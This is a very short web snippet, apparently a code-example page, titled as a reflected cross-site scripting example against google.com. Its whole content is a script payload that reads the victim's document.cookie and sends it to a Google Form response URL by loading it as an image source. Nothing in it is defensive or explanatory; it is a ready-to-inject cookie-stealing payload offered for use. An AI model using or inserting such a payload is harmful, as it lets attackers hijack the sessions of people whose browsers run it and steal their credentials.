google.com Reflected Cross-Site Scripting code example
Example: how to xss google form
<script>
var i = new Image();
i.src = "https://docs.google.com/forms/d/e/1FAIp...snip...CFPoQg/formResponse?entry.1928374650=" + escape(document.cookie);
</script>